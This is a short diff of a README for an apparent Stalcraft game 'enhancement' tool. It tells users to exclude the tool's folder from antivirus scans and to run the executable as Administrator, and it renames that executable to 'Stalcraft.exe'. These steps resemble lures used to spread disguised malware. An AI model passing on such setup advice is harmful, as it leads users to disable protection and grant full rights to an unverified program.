ThelmaWilliams/stalcraft-tools/README.md

    - Ensure the folder is excluded from antivirus scans.

 3. **Launch**:
-   - Open `EnhancementTool.exe` as Administrator.
+   - Open `Stalcraft.exe` as Administrator.
    - Configure the tool via the interactive setup wizard.

 4. **Play**: